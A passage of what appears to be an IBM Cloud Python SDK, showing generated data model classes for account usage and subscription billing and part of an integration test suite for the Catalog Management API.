args['discounts'] = [Discount.from_dict(x) for x in _dict.get('discounts')]
else:
raise ValueError('Required property \'discounts\' not present in Resource JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Resource object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'resource_id') and self.resource_id is not None:
_dict['resource_id'] = self.resource_id
if hasattr(self, 'resource_name') and self.resource_name is not None:
_dict['resource_name'] = self.resource_name
if hasattr(self, 'billable_cost') and self.billable_cost is not None:
_dict['billable_cost'] = self.billable_cost
if hasattr(self, 'billable_rated_cost') and self.billable_rated_cost is not None:
_dict['billable_rated_cost'] = self.billable_rated_cost
if hasattr(self, 'non_billable_cost') and self.non_billable_cost is not None:
_dict['non_billable_cost'] = self.non_billable_cost
if hasattr(self, 'non_billable_rated_cost') and self.non_billable_rated_cost is not None:
_dict['non_billable_rated_cost'] = self.non_billable_rated_cost
if hasattr(self, 'plans') and self.plans is not None:
_dict['plans'] = [x.to_dict() for x in self.plans]
if hasattr(self, 'discounts') and self.discounts is not None:
_dict['discounts'] = [x.to_dict() for x in self.discounts]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Resource object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Resource') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Resource') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ResourceGroupUsage():
"""
The aggregated usage and charges for all the plans in the resource group.
:attr str account_id: The ID of the account.
:attr str resource_group_id: The ID of the resource group.
:attr str resource_group_name: (optional) The name of the resource group.
:attr str pricing_country: The target country pricing that should be used.
:attr str currency_code: The currency for the cost fields in the resources,
plans and metrics.
:attr str month: The month.
:attr List[Resource] resources: All the resource used in the account.
"""
def __init__(self,
account_id: str,
resource_group_id: str,
pricing_country: str,
currency_code: str,
month: str,
resources: List['Resource'],
*,
resource_group_name: str = None) -> None:
"""
Initialize a ResourceGroupUsage object.
:param str account_id: The ID of the account.
:param str resource_group_id: The ID of the resource group.
:param str pricing_country: The target country pricing that should be used.
:param str currency_code: The currency for the cost fields in the
resources, plans and metrics.
:param str month: The month.
:param List[Resource] resources: All the resource used in the account.
:param str resource_group_name: (optional) The name of the resource group.
"""
self.account_id = account_id
self.resource_group_id = resource_group_id
self.resource_group_name = resource_group_name
self.pricing_country = pricing_country
self.currency_code = currency_code
self.month = month
self.resources = resources
@classmethod
def from_dict(cls, _dict: Dict) -> 'ResourceGroupUsage':
"""Initialize a ResourceGroupUsage object from a json dictionary."""
args = {}
if 'account_id' in _dict:
args['account_id'] = _dict.get('account_id')
else:
raise ValueError('Required property \'account_id\' not present in ResourceGroupUsage JSON')
if 'resource_group_id' in _dict:
args['resource_group_id'] = _dict.get('resource_group_id')
else:
raise ValueError('Required property \'resource_group_id\' not present in ResourceGroupUsage JSON')
if 'resource_group_name' in _dict:
args['resource_group_name'] = _dict.get('resource_group_name')
if 'pricing_country' in _dict:
args['pricing_country'] = _dict.get('pricing_country')
else:
raise ValueError('Required property \'pricing_country\' not present in ResourceGroupUsage JSON')
if 'currency_code' in _dict:
args['currency_code'] = _dict.get('currency_code')
else:
raise ValueError('Required property \'currency_code\' not present in ResourceGroupUsage JSON')
if 'month' in _dict:
args['month'] = _dict.get('month')
else:
raise ValueError('Required property \'month\' not present in ResourceGroupUsage JSON')
if 'resources' in _dict:
args['resources'] = [Resource.from_dict(x) for x in _dict.get('resources')]
else:
raise ValueError('Required property \'resources\' not present in ResourceGroupUsage JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ResourceGroupUsage object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'account_id') and self.account_id is not None:
_dict['account_id'] = self.account_id
if hasattr(self, 'resource_group_id') and self.resource_group_id is not None:
_dict['resource_group_id'] = self.resource_group_id
if hasattr(self, 'resource_group_name') and self.resource_group_name is not None:
_dict['resource_group_name'] = self.resource_group_name
if hasattr(self, 'pricing_country') and self.pricing_country is not None:
_dict['pricing_country'] = self.pricing_country
if hasattr(self, 'currency_code') and self.currency_code is not None:
_dict['currency_code'] = self.currency_code
if hasattr(self, 'month') and self.month is not None:
_dict['month'] = self.month
if hasattr(self, 'resources') and self.resources is not None:
_dict['resources'] = [x.to_dict() for x in self.resources]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ResourceGroupUsage object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ResourceGroupUsage') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ResourceGroupUsage') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class ResourcesSummary():
"""
Charges related to cloud resources.
:attr float billable_cost: The billable charges for all cloud resources used in
the account.
:attr float non_billable_cost: Non-billable charges for all cloud resources used
in the account.
"""
def __init__(self,
billable_cost: float,
non_billable_cost: float) -> None:
"""
Initialize a ResourcesSummary object.
:param float billable_cost: The billable charges for all cloud resources
used in the account.
:param float non_billable_cost: Non-billable charges for all cloud
resources used in the account.
"""
self.billable_cost = billable_cost
self.non_billable_cost = non_billable_cost
@classmethod
def from_dict(cls, _dict: Dict) -> 'ResourcesSummary':
"""Initialize a ResourcesSummary object from a json dictionary."""
args = {}
if 'billable_cost' in _dict:
args['billable_cost'] = _dict.get('billable_cost')
else:
raise ValueError('Required property \'billable_cost\' not present in ResourcesSummary JSON')
if 'non_billable_cost' in _dict:
args['non_billable_cost'] = _dict.get('non_billable_cost')
else:
raise ValueError('Required property \'non_billable_cost\' not present in ResourcesSummary JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a ResourcesSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'billable_cost') and self.billable_cost is not None:
_dict['billable_cost'] = self.billable_cost
if hasattr(self, 'non_billable_cost') and self.non_billable_cost is not None:
_dict['non_billable_cost'] = self.non_billable_cost
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this ResourcesSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'ResourcesSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'ResourcesSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class Subscription():
"""
Subscription.
:attr str subscription_id: The ID of the subscription.
:attr str charge_agreement_number: The charge agreement number of the
subsciption.
:attr str type: Type of the subscription.
:attr float subscription_amount: The credits available in the subscription for
the month.
:attr datetime start: The date from which the subscription was active.
:attr datetime end: (optional) The date until which the subscription is active.
End time is unavailable for PayGO accounts.
:attr float credits_total: The total credits available in the subscription.
:attr List[SubscriptionTerm] terms: The terms through which the subscription is
split into.
"""
def __init__(self,
subscription_id: str,
charge_agreement_number: str,
type: str,
subscription_amount: float,
start: datetime,
credits_total: float,
terms: List['SubscriptionTerm'],
*,
end: datetime = None) -> None:
"""
Initialize a Subscription object.
:param str subscription_id: The ID of the subscription.
:param str charge_agreement_number: The charge agreement number of the
subsciption.
:param str type: Type of the subscription.
:param float subscription_amount: The credits available in the subscription
for the month.
:param datetime start: The date from which the subscription was active.
:param float credits_total: The total credits available in the
subscription.
:param List[SubscriptionTerm] terms: The terms through which the
subscription is split into.
:param datetime end: (optional) The date until which the subscription is
active. End time is unavailable for PayGO accounts.
"""
self.subscription_id = subscription_id
self.charge_agreement_number = charge_agreement_number
self.type = type
self.subscription_amount = subscription_amount
self.start = start
self.end = end
self.credits_total = credits_total
self.terms = terms
@classmethod
def from_dict(cls, _dict: Dict) -> 'Subscription':
"""Initialize a Subscription object from a json dictionary."""
args = {}
if 'subscription_id' in _dict:
args['subscription_id'] = _dict.get('subscription_id')
else:
raise ValueError('Required property \'subscription_id\' not present in Subscription JSON')
if 'charge_agreement_number' in _dict:
args['charge_agreement_number'] = _dict.get('charge_agreement_number')
else:
raise ValueError('Required property \'charge_agreement_number\' not present in Subscription JSON')
if 'type' in _dict:
args['type'] = _dict.get('type')
else:
raise ValueError('Required property \'type\' not present in Subscription JSON')
if 'subscription_amount' in _dict:
args['subscription_amount'] = _dict.get('subscription_amount')
else:
raise ValueError('Required property \'subscription_amount\' not present in Subscription JSON')
if 'start' in _dict:
args['start'] = string_to_datetime(_dict.get('start'))
else:
raise ValueError('Required property \'start\' not present in Subscription JSON')
if 'end' in _dict:
args['end'] = string_to_datetime(_dict.get('end'))
if 'credits_total' in _dict:
args['credits_total'] = _dict.get('credits_total')
else:
raise ValueError('Required property \'credits_total\' not present in Subscription JSON')
if 'terms' in _dict:
args['terms'] = [SubscriptionTerm.from_dict(x) for x in _dict.get('terms')]
else:
raise ValueError('Required property \'terms\' not present in Subscription JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a Subscription object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'subscription_id') and self.subscription_id is not None:
_dict['subscription_id'] = self.subscription_id
if hasattr(self, 'charge_agreement_number') and self.charge_agreement_number is not None:
_dict['charge_agreement_number'] = self.charge_agreement_number
if hasattr(self, 'type') and self.type is not None:
_dict['type'] = self.type
if hasattr(self, 'subscription_amount') and self.subscription_amount is not None:
_dict['subscription_amount'] = self.subscription_amount
if hasattr(self, 'start') and self.start is not None:
_dict['start'] = datetime_to_string(self.start)
if hasattr(self, 'end') and self.end is not None:
_dict['end'] = datetime_to_string(self.end)
if hasattr(self, 'credits_total') and self.credits_total is not None:
_dict['credits_total'] = self.credits_total
if hasattr(self, 'terms') and self.terms is not None:
_dict['terms'] = [x.to_dict() for x in self.terms]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this Subscription object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'Subscription') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'Subscription') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SubscriptionSummary():
"""
A summary of charges and credits related to a subscription.
:attr float overage: (optional) The charges after exhausting subscription
credits and offers credits.
:attr List[Subscription] subscriptions: (optional) The list of subscriptions
applicable for the month.
"""
def __init__(self,
*,
overage: float = None,
subscriptions: List['Subscription'] = None) -> None:
"""
Initialize a SubscriptionSummary object.
:param float overage: (optional) The charges after exhausting subscription
credits and offers credits.
:param List[Subscription] subscriptions: (optional) The list of
subscriptions applicable for the month.
"""
self.overage = overage
self.subscriptions = subscriptions
@classmethod
def from_dict(cls, _dict: Dict) -> 'SubscriptionSummary':
"""Initialize a SubscriptionSummary object from a json dictionary."""
args = {}
if 'overage' in _dict:
args['overage'] = _dict.get('overage')
if 'subscriptions' in _dict:
args['subscriptions'] = [Subscription.from_dict(x) for x in _dict.get('subscriptions')]
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SubscriptionSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'overage') and self.overage is not None:
_dict['overage'] = self.overage
if hasattr(self, 'subscriptions') and self.subscriptions is not None:
_dict['subscriptions'] = [x.to_dict() for x in self.subscriptions]
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SubscriptionSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SubscriptionSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SubscriptionSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SubscriptionTerm():
"""
SubscriptionTerm.
:attr datetime start: The start date of the term.
:attr datetime end: The end date of the term.
:attr SubscriptionTermCredits credits: Information about credits related to a
subscription.
"""
def __init__(self,
start: datetime,
end: datetime,
credits: 'SubscriptionTermCredits') -> None:
"""
Initialize a SubscriptionTerm object.
:param datetime start: The start date of the term.
:param datetime end: The end date of the term.
:param SubscriptionTermCredits credits: Information about credits related
to a subscription.
"""
self.start = start
self.end = end
self.credits = credits
@classmethod
def from_dict(cls, _dict: Dict) -> 'SubscriptionTerm':
"""Initialize a SubscriptionTerm object from a json dictionary."""
args = {}
if 'start' in _dict:
args['start'] = string_to_datetime(_dict.get('start'))
else:
raise ValueError('Required property \'start\' not present in SubscriptionTerm JSON')
if 'end' in _dict:
args['end'] = string_to_datetime(_dict.get('end'))
else:
raise ValueError('Required property \'end\' not present in SubscriptionTerm JSON')
if 'credits' in _dict:
args['credits'] = SubscriptionTermCredits.from_dict(_dict.get('credits'))
else:
raise ValueError('Required property \'credits\' not present in SubscriptionTerm JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SubscriptionTerm object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'start') and self.start is not None:
_dict['start'] = datetime_to_string(self.start)
if hasattr(self, 'end') and self.end is not None:
_dict['end'] = datetime_to_string(self.end)
if hasattr(self, 'credits') and self.credits is not None:
_dict['credits'] = self.credits.to_dict()
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SubscriptionTerm object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SubscriptionTerm') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SubscriptionTerm') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SubscriptionTermCredits():
"""
Information about credits related to a subscription.
:attr float total: The total credits available for the term.
:attr float starting_balance: The unused credits in the term at the beginning of
the month.
:attr float used: The credits used in this month.
:attr float balance: The remaining credits in this term.
"""
def __init__(self,
total: float,
starting_balance: float,
used: float,
balance: float) -> None:
"""
Initialize a SubscriptionTermCredits object.
:param float total: The total credits available for the term.
:param float starting_balance: The unused credits in the term at the
beginning of the month.
:param float used: The credits used in this month.
:param float balance: The remaining credits in this term.
"""
self.total = total
self.starting_balance = starting_balance
self.used = used
self.balance = balance
@classmethod
def from_dict(cls, _dict: Dict) -> 'SubscriptionTermCredits':
"""Initialize a SubscriptionTermCredits object from a json dictionary."""
args = {}
if 'total' in _dict:
args['total'] = _dict.get('total')
else:
raise ValueError('Required property \'total\' not present in SubscriptionTermCredits JSON')
if 'starting_balance' in _dict:
args['starting_balance'] = _dict.get('starting_balance')
else:
raise ValueError('Required property \'starting_balance\' not present in SubscriptionTermCredits JSON')
if 'used' in _dict:
args['used'] = _dict.get('used')
else:
raise ValueError('Required property \'used\' not present in SubscriptionTermCredits JSON')
if 'balance' in _dict:
args['balance'] = _dict.get('balance')
else:
raise ValueError('Required property \'balance\' not present in SubscriptionTermCredits JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SubscriptionTermCredits object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'total') and self.total is not None:
_dict['total'] = self.total
if hasattr(self, 'starting_balance') and self.starting_balance is not None:
_dict['starting_balance'] = self.starting_balance
if hasattr(self, 'used') and self.used is not None:
_dict['used'] = self.used
if hasattr(self, 'balance') and self.balance is not None:
_dict['balance'] = self.balance
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SubscriptionTermCredits object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SubscriptionTermCredits') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SubscriptionTermCredits') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
class SupportSummary():
"""
SupportSummary.
:attr float cost: The monthly support cost.
:attr str type: The type of support.
:attr float overage: Additional support cost for the month.
"""
def __init__(self,
cost: float,
type: str,
overage: float) -> None:
"""
Initialize a SupportSummary object.
:param float cost: The monthly support cost.
:param str type: The type of support.
:param float overage: Additional support cost for the month.
"""
self.cost = cost
self.type = type
self.overage = overage
@classmethod
def from_dict(cls, _dict: Dict) -> 'SupportSummary':
"""Initialize a SupportSummary object from a json dictionary."""
args = {}
if 'cost' in _dict:
args['cost'] = _dict.get('cost')
else:
raise ValueError('Required property \'cost\' not present in SupportSummary JSON')
if 'type' in _dict:
args['type'] = _dict.get('type')
else:
raise ValueError('Required property \'type\' not present in SupportSummary JSON')
if 'overage' in _dict:
args['overage'] = _dict.get('overage')
else:
raise ValueError('Required property \'overage\' not present in SupportSummary JSON')
return cls(**args)
@classmethod
def _from_dict(cls, _dict):
"""Initialize a SupportSummary object from a json dictionary."""
return cls.from_dict(_dict)
def to_dict(self) -> Dict:
"""Return a json dictionary representing this model."""
_dict = {}
if hasattr(self, 'cost') and self.cost is not None:
_dict['cost'] = self.cost
if hasattr(self, 'type') and self.type is not None:
_dict['type'] = self.type
if hasattr(self, 'overage') and self.overage is not None:
_dict['overage'] = self.overage
return _dict
def _to_dict(self):
"""Return a json dictionary representing this model."""
return self.to_dict()
def __str__(self) -> str:
"""Return a `str` version of this SupportSummary object."""
return json.dumps(self.to_dict(), indent=2)
def __eq__(self, other: 'SupportSummary') -> bool:
"""Return `true` when self and other are equal, false otherwise."""
if not isinstance(other, self.__class__):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other: 'SupportSummary') -> bool:
"""Return `true` when self and other are not equal, false otherwise."""
return not self == other
```
#### File: test/integration/test_catalog_management_v1.py
```python
import os
import pytest
from ibm_cloud_sdk_core import *
from ibm_platform_services.catalog_management_v1 import *
# Config file name
config_file = 'catalog_mgmt.env'
catalog_id = None
offering_id = None
object_id = None
version_locator_id = None
offering_instance_id = None
created_offering_ids = []
created_object_ids = []
kind_vpe = 'vpe'
kind_roks = 'roks'
kind_offering = 'offering'
repo_type_git_public = 'git_public'
object_name = 'object_created_by_python_sdk_5'
object_crn = 'crn:v1:bluemix:public:iam-global-endpoint:global:::endpoint:private.iam.cloud.ibm.com'
region_us_south = 'us-south'
namespace_python_sdk = 'python-sdk'
import_offering_zip_url = 'https://github.com/rhm-samples/node-red-operator/blob/master/node-red-operator/bundle/0.0' \
'.2/node-red-operator.v0.0.2.clusterserviceversion.yaml'
label_python_sdk = 'python-sdk'
bogus_revision = 'bogus-revision'
bogus_version_locator_id = 'bogus-version-locator-id'
class TestCatalogManagementV1():
"""
Integration Test Class for CatalogManagementV1
"""
@classmethod
def setup_class(cls):
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
cls.catalog_management_service_authorized = CatalogManagementV1.new_instance(
)
assert cls.catalog_management_service_authorized is not None
cls.catalog_management_service_not_authorized = CatalogManagementV1.new_instance(
'NOT_AUTHORIZED'
)
assert cls.catalog_management_service_not_authorized is not None
cls.config = read_external_sources(
CatalogManagementV1.DEFAULT_SERVICE_NAME)
assert cls.config is not None
cls.account_id = cls.config.get('ACCOUNT_ID')
assert cls.account_id is not None
cls.cluster_id = cls.config.get('CLUSTER_ID')
assert cls.cluster_id is not None
cls.git_auth_token = cls.config.get('GIT_TOKEN')
assert cls.git_auth_token is not None
cls.catalog_management_service_authorized.get_catalog_account()
authenticator_authorized = cls.catalog_management_service_authorized.get_authenticator()
token_manager_authorized = authenticator_authorized.token_manager
cls.refresh_token_authorized = token_manager_authorized.request_token()['refresh_token']
assert cls.refresh_token_authorized is not None
cls.catalog_management_service_not_authorized.get_catalog_account()
authenticator_unauthorized = cls.catalog_management_service_not_authorized.get_authenticator()
token_manager_unauthorized = authenticator_unauthorized.token_manager
cls.refresh_token_not_authorized = token_manager_unauthorized.request_token()['refresh_token']
assert cls.refresh_token_not_authorized is not None
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file), reason="External configuration not available, skipping..."
)
####
# Create Catalog
####
@needscredentials
def test_create_catalog_returns_400_when_user_is_not_authorized(self):
try:
self.catalog_management_service_not_authorized.create_catalog(
label=label_python_sdk,
tags=['sdk', 'python'],
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_catalog_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.create_catalog(
label=label_python_sdk,
revision=bogus_revision,
tags=['sdk', 'python'],
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_catalog(self):
global catalog_id
create_catalog_response = self.catalog_management_service_authorized.create_catalog(
label=label_python_sdk,
tags=['sdk', 'python'],
kind=kind_vpe,
owning_account=self.account_id,
)
assert create_catalog_response.get_status_code() == 201
catalog = create_catalog_response.get_result()
assert catalog is not None
assert catalog['id'] is not None
catalog_id = catalog['id']
####
# Get Catalog
####
@needscredentials
def test_get_catalog_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_catalog(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_catalog_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_catalog(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog(self):
assert catalog_id is not None
get_catalog_response = self.catalog_management_service_authorized.get_catalog(
catalog_identifier=catalog_id,
)
assert get_catalog_response.get_status_code() == 200
catalog = get_catalog_response.get_result()
assert catalog is not None
assert catalog['id'] == catalog_id
####
# Replace Catalog
####
@needscredentials
def test_replace_catalog_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.replace_catalog(
catalog_identifier=catalog_id,
id=catalog_id,
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_catalog_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.replace_catalog(
catalog_identifier=catalog_id,
id='invalid-'+catalog_id,
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_replace_catalog_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.replace_catalog(
catalog_identifier='invalid-'+catalog_id,
id='invalid-'+catalog_id,
owning_account=self.account_id,
kind=kind_vpe,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_catalog(self):
assert catalog_id is not None
update_tags = ['python', 'sdk', 'update']
replace_catalog_response = self.catalog_management_service_authorized.replace_catalog(
catalog_identifier=catalog_id,
id=catalog_id,
tags=update_tags,
owning_account=self.account_id,
kind=kind_vpe,
)
assert replace_catalog_response.get_status_code() == 200
catalog = replace_catalog_response.get_result()
assert catalog is not None
assert catalog['tags'] == update_tags
####
# List Catalog
####
@needscredentials
def test_list_catalogs(self):
assert catalog_id is not None
list_catalogs_response = self.catalog_management_service_authorized.list_catalogs()
assert list_catalogs_response.get_status_code() == 200
catalog_search_result = list_catalogs_response.get_result()
assert catalog_search_result is not None
assert next((catalog for catalog in catalog_search_result['resources']
if catalog['id'] == catalog_id),
None) is not None
####
# Create Offering
####
@needscredentials
def test_create_offering_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.create_offering(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_create_offering_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.create_offering(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name='offering created by python sdk',
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.create_offering(
catalog_identifier=catalog_id,
id=catalog_id,
name='offering-created-by-python-sdk',
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_offering(self):
global offering_id
global created_offering_ids
assert catalog_id is not None
for i in range(2):
create_offering_response = self.catalog_management_service_authorized.create_offering(
catalog_identifier=catalog_id,
label=label_python_sdk,
name='offering-created-by-python-sdk-'+str(i),
)
assert create_offering_response.get_status_code() == 201
offering = create_offering_response.get_result()
assert offering is not None
assert offering['id'] is not None
print('offering id: '+offering['id'])
if offering_id is None:
offering_id = offering['id']
created_offering_ids.append(offering['id'])
####
# Get Offering
####
@needscredentials
def test_get_offering_returns_404_when_no_such_offering(self):
assert offering_id is not None
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_returns_403_when_user_is_not_authorized(self):
assert offering_id is not None
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering(self):
assert offering_id is not None
assert catalog_id is not None
get_offering_response = self.catalog_management_service_authorized.get_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
assert get_offering_response.get_status_code() == 200
offering = get_offering_response.get_result()
assert offering is not None
assert offering['id'] == offering_id
assert offering['catalog_id'] == catalog_id
####
# Replace Offering
####
@needscredentials
def test_replace_offering_returns_404_when_no_such_offering(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
id='invalid-'+offering_id,
name='updated-offering-name-by-python-sdk',
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_replace_offering_returns_400_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name='updated offering name by python sdk',
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_replace_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name='updated-offering-name-by-python-sdk',
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_replace_offering_returns_409_when_conflict_occurs(self):
assert catalog_id is not None
assert offering_id is not None
# once the version related conflict is resolved this test requires a conflict case
try:
self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name='updated-offering-name-by-python-sdk',
)
except ApiException as e:
assert e.code == 409
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering(self):
assert catalog_id is not None
assert offering_id is not None
# update conflict on revisions
updated_offering_name = 'updated-offering-by-python-sdk'
replace_offering_response = self.catalog_management_service_authorized.replace_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
id=offering_id,
name=updated_offering_name,
)
assert replace_offering_response.get_status_code() == 200
offering = replace_offering_response.get_result()
assert offering is not None
assert offering['id'] == offering_id
assert offering['catalog_id'] == catalog_id
assert offering['name'] == updated_offering_name
####
# List Offerings
####
@needscredentials
def test_list_offerings_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.list_offerings(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_list_offerings_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.list_offerings(
catalog_identifier=catalog_id,
digest=True,
sort='bogus-sort-value'
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_list_offerings_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.list_offerings(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_list_offerings(self):
assert catalog_id is not None
limit = 1
offset = 0
amount_of_offerings = 0
while offset > 0:
list_offerings_response = self.catalog_management_service_authorized.list_offerings(
catalog_identifier=catalog_id,
limit=limit,
offset=offset,
)
assert list_offerings_response.get_status_code() == 200
offering_search_result = list_offerings_response.get_result()
assert offering_search_result is not None
offset_value = get_query_param(offering_search_result.next, 'offset')
print('offset value: '+offset_value)
if offset_value is None:
offset = offset_value
else:
offset = 0
print('Amount of offerings is: '+str(amount_of_offerings))
####
# Import Offering
####
@needscredentials
def test_import_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_vpe],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.3',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_import_offering_returns_400_when_backend_input_validation_fails(self):
